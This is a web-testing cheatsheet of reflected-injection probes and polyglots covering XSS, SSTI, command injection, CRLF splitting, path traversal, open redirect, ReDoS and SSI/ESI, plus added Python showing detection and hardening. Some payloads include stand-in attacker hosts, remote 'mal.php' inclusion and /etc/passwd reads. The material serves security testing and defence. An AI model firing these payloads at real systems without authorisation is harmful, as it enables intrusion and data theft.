Reflecting Techniques - PoCs and Polygloths CheatSheet


The purpose of these PoCs and polyglots is to give the tester a quick summary of the vulnerabilities that become exploitable when their input is somehow reflected in the response.

This cheatsheet does not propose an exhaustive list of tests for each vulnerability, only some basic ones. If you are looking for more complete tests, go to the page of each vulnerability listed here.

You will not find Content-Type dependent injections such as XXE here, since you will usually test those yourself when you find a request that sends XML data. Nor will you find database injections: even though some content may be reflected, exploitation depends heavily on the backend technology and on the structure of the database.
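The workflow this page assumes (send a marker-wrapped payload, find where it comes back, check which metacharacters survived encoding and, for the {{7*7}}-style tests in the Client Side and Server Side Template Injection sections, whether the value was evaluated rather than echoed) is mechanical enough to script. The following Python is an added example, not code from HackTricks: the canary strings, the metacharacter-to-vulnerability mapping and the three response bodies are constructed for the example.

```python
import re
from typing import Optional

# Alphanumeric canaries survive HTML and URL encoding, so the reflected span can be
# located even when every metacharacter in the payload was neutralised.
CANARY_OPEN, CANARY_CLOSE = "zq7x", "x7qz"

# Which surviving metacharacter points at which class on this page.
# Mapping chosen for this example, not taken from the page.
METACHARS = {
    "<": "HTML injection / XSS / dangling markup",
    '"': "attribute breakout (XSS)",
    "'": "attribute or JS-string breakout (XSS)",
    "\r\n": "CRLF / header injection",
    "{{": "template injection (CSTI/SSTI)",
    ";": "command separator (command injection)",
}


def wrap(payload: str) -> str:
    """The payload as it should be sent: surrounded by the canaries."""
    return CANARY_OPEN + payload + CANARY_CLOSE


def reflected_spans(body: str):
    """Every substring that came back between the canaries (a value may be reflected more than once)."""
    pattern = re.escape(CANARY_OPEN) + "(.*?)" + re.escape(CANARY_CLOSE)
    return re.findall(pattern, body, flags=re.S)


def analyse(payload: str, body: str, evaluates_to: Optional[str] = None):
    """Classify each reflection of `payload` found in `body`.

    evaluates_to: the value the payload produces if it is executed instead of
    echoed (e.g. "49" for {{7*7}}); used to flag template/expression evaluation.
    """
    results = []
    for got in reflected_spans(body):
        survived = [hint for meta, hint in METACHARS.items() if meta in payload and meta in got]
        neutralised = [hint for meta, hint in METACHARS.items() if meta in payload and meta not in got]
        results.append({
            "reflected": got,
            "verbatim": got == payload,
            "evaluated": evaluates_to is not None and got == evaluates_to,
            "survived": survived,
            "neutralised": neutralised,
        })
    return results


# Constructed responses standing in for what three different endpoints might return.
ESCAPED = "<p>Search results for zq7x&lt;img src=x onerror=alert(1)&gt;x7qz</p>"
ATTRIBUTE = '<input name="q" value="zq7x" onclick=alert() a="x7qz">'
TEMPLATE = "<h1>Hello zq7x49x7qz</h1>"

if __name__ == "__main__":
    for payload, body, expect in [
        ("<img src=x onerror=alert(1)>", ESCAPED, None),
        ('" onclick=alert() a="', ATTRIBUTE, None),
        ("{{7*7}}", TEMPLATE, "49"),
    ]:
        print(wrap(payload), "->", analyse(payload, body, expect))
```

The first response shows a payload that is reflected but HTML-encoded (nothing to exploit in that context), the second a double quote that survived inside an attribute (the attribute-breakout test from the XSS section applies), and the third a template expression that came back as its result, which is the signal the template-injection sections look for.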

List of Polyglots

{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AN INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

Client Side Template Injection

Basic tests

{{7*7}}
[7*7]

Polyglots

In this cheatsheet a polyglot is a single payload that combines several of the basic tests, so one reflected value exercises every context at once. This one covers both the {{ }} and the [ ] expression syntaxes above:

{{7*7}}[7*7]

Command Injection

Basic tests

;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)

Polyglots

The first payload terminates an unquoted, a single-quoted or a double-quoted shell context with ; and comments out whatever follows, uses ${IFS} in place of spaces (which are often filtered) and relies on the delay of sleep as a blind, time-based oracle. The second mixes the same shell substitutions ($(...) and backticks) with comment delimiters and sleep(5) calls so that it also fires when the value lands inside other expression syntaxes rather than a plain shell command:

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

CRLF Injection

Basic tests

These only work when the reflected value is written into a response header (typically Location or Set-Cookie) without the CR/LF being stripped. The first payload adds a header, the next two close the header block and inject an HTML body (the X-XSS-Protection: 0 header is there to disable the legacy browser XSS filter), and the last one splits the response in two so that a second, attacker-controlled response follows the first.

```bash
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
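The response-splitting payloads above assume a handler that URL-decodes a parameter and writes it into a header. The following Python is an added example, not code from the page: a hypothetical redirect handler that does exactly that, next to a hardened version, with a minimal response parser showing what the second payload from the list does to the header block. The handler, the https://example.com/next target and the header layout are assumptions made for the example.

```python
import urllib.parse

# Second payload from the list above, exactly as it would be sent in a query string.
PAYLOAD = ("%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0"
           "%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E")

REDIRECT_BASE = "https://example.com/next"   # assumed target the handler appends the value to


def vulnerable_redirect(raw_param: str) -> bytes:
    """Hypothetical handler: URL-decodes a query value and puts it straight into Location."""
    target = REDIRECT_BASE + urllib.parse.unquote(raw_param)
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def hardened_redirect(raw_param: str) -> bytes:
    """Same handler with the check modern servers and frameworks apply: no CR or LF in a header value."""
    target = REDIRECT_BASE + urllib.parse.unquote(raw_param)
    if "\r" in target or "\n" in target:
        raise ValueError("refusing CR/LF in a header value")
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def hardened_rejects(raw_param: str) -> bool:
    """True when the hardened handler refuses the value."""
    try:
        hardened_redirect(raw_param)
    except ValueError:
        return True
    return False


def parse_response(raw: bytes):
    """Split a raw response the way a client does: status line, lower-cased (name, value) headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body.decode("latin-1")


if __name__ == "__main__":
    status, headers, body = parse_response(vulnerable_redirect(PAYLOAD))
    print(status)
    for header in headers:
        print(header)      # injected Content-Type and X-XSS-Protection show up as real headers
    print(repr(body))      # the <script> became the response body
    print("hardened rejects payload:", hardened_rejects(PAYLOAD))
```

Parsing the vulnerable output shows the injected Content-Type: text/html and X-XSS-Protection: 0 as ordinary headers and the script as the body, which is why a browser following the redirect renders it; the original Content-Length: 0 ends up inside the body, after the script, where the client never looks at it. The hardened handler raises on the first CR or LF, which is the check to confirm is present (server-side, not only in the framework) when a test value comes back with the %0d%0a decoded.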

Dangling Markup

Basic tests

<br><b><h1>THIS IS AN INJECTED TITLE </h1>

File Inclusion/Path Traversal

Basic tests

/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
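Added example, not from the page: the absolute-path and ../ payloads above run against a naive ".." filter and against a normalise-then-check containment test. The base directory /srv/files and the function names are assumptions for the example.

```python
import posixpath

BASE = "/srv/files"   # assumed document root for the example


def naive_resolve(name: str):
    """Broken check: refuses any '..' but lets an absolute path replace the base directory."""
    if ".." in name:
        return None
    # posixpath.join (like os.path.join) discards BASE entirely when name starts with "/"
    return posixpath.join(BASE, name)


def safe_resolve(name: str):
    """Normalise first, then require the result to stay inside BASE."""
    candidate = posixpath.normpath(posixpath.join(BASE, name))
    if candidate == BASE or candidate.startswith(BASE + "/"):
        return candidate
    return None


if __name__ == "__main__":
    for name in ["report.pdf", "../../../../../../etc/hosts", "/etc/passwd", "reports/../report.pdf"]:
        print(f"{name!r:32} naive={naive_resolve(name)!r:28} safe={safe_resolve(name)!r}")
```

The ../ chains are the payloads the naive filter does catch; /etc/passwd is the one it does not, because the join throws the base away. posixpath is used so the example behaves identically on any host; real code should resolve through os.path.realpath as well, so a symlink inside the base cannot point outside it. The ..\ payloads in the list above matter on Windows targets, where the backslash is also a separator, and on any target whose filter only looks for forward slashes.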

Open Redirect

Basic tests

www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
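Why these five values are the basic tests is easiest to see against an actual check. The following Python is an added example, not taken from the page: a typical prefix/substring check next to a parse-then-allow-list check, both run over the page's five values. ALLOWED_HOSTS and the function names are assumed for the example.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.whitelisted.com"}   # assumed allow-list for the example


def naive_is_safe(url: str) -> bool:
    """Typical broken check: a value without http(s):// is treated as a local path,
    anything else only has to contain the allowed host somewhere."""
    if not url.lower().startswith(("http://", "https://")):
        return True
    return any(host in url for host in ALLOWED_HOSTS)


def strict_is_safe(url: str) -> bool:
    """Parse first, then allow only a same-site path or an absolute http(s) URL whose host is on the list."""
    parts = urlsplit(url)
    if parts.scheme == "" and parts.netloc == "":
        # A relative path must start with exactly one "/"; browsers turn "//" and "/\" into a new host.
        return parts.path.startswith("/") and not parts.path.startswith(("//", "/\\"))
    if parts.scheme.lower() not in ("http", "https"):
        return False                         # javascript:, data:, and friends
    return parts.hostname in ALLOWED_HOSTS   # hostname, not netloc: "user@host" is split off


PAGE_TESTS = [
    "www.whitelisted.com",
    "www.whitelisted.com.evil.com",
    "https://google.com",
    "//google.com",
    "javascript:alert(1)",
]

if __name__ == "__main__":
    extra = ["https://www.whitelisted.com/account", "/account", "https://www.whitelisted.com@evil.com/"]
    for url in PAGE_TESTS + extra:
        print(f"{url:42} naive={naive_is_safe(url)!s:6} strict={strict_is_safe(url)}")
```

The naive check lets four of the five through: the bare host and its .evil.com extension because they carry no scheme, the protocol-relative //google.com for the same reason, and javascript:alert(1) likewise; only https://google.com is caught. The strict version accepts a same-site path or an allow-listed host and nothing else, and rejects the user@host form, which is the SSRF-side variant of the same bypass.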

ReDoS

Basic tests

Use these where the reflected input is compiled as, or matched against, a regular expression on the server side. Each pattern has nested quantifiers, so a long input that almost matches (for example many "a" characters followed by "!") forces exponential backtracking:

```bash
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
```

Server Side Inclusion/Edge Side Inclusion (../server-side-inclusion-edge-side-inclusion-injection.md)

Basic tests

<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Polyglots

<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

SSRF

The same tests used for Open Redirect can be used here.

Server Side Template Injection

Basic tests

${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Polyglots

{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\

XSLT Server Side Injection

Basic tests

<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

Polyglots

<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

XSS

Basic tests

<script>alert('XSS')</script>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
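The basic tests target different reflection contexts: the second breaks out of a quoted attribute value and adds an event handler, the third closes the tag and opens a new one, and the last matters where the value lands in an href or src. Added example, not the page's code: a hypothetical template that reflects into a quoted attribute, first unescaped and then with html.escape, with the standard-library HTML parser used to show what a browser's parser would see in each case. The input snippet and the function names are assumptions.

```python
import html
from html.parser import HTMLParser


def vulnerable_render(value: str) -> str:
    """Hypothetical template that drops the reflected value into a quoted attribute unchanged."""
    return '<input name="q" value="' + value + '">'


def hardened_render(value: str) -> str:
    """Same template with attribute-context escaping (quote=True also encodes ' and ")."""
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'


class HandlerSpy(HTMLParser):
    """Records every tag and every on* attribute the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [(tag, name) for name, _ in attrs if name.startswith("on")]


def event_handlers(fragment: str):
    """Return (tags seen, (tag, attribute) pairs for event handlers) for an HTML fragment."""
    spy = HandlerSpy()
    spy.feed(fragment)
    spy.close()
    return spy.tags, spy.handlers


if __name__ == "__main__":
    for payload in ['" onclick=alert() a="', '\'"><img src=x onerror=alert(1) />']:
        for render in (vulnerable_render, hardened_render):
            print(render.__name__, repr(render(payload)), event_handlers(render(payload)))
```

With the unescaped template the first payload turns into an onclick attribute on the input and the second into a second element carrying onerror; after html.escape both come back as the plain value of a single attribute. The escaping is specific to a quoted attribute: an unquoted attribute, a JavaScript string, a URL attribute or a CSS value each need their own encoding, which is why the polyglots below try to break out of all of those contexts at once.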

Polyglots

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=document.location=`//localhost/mH`//>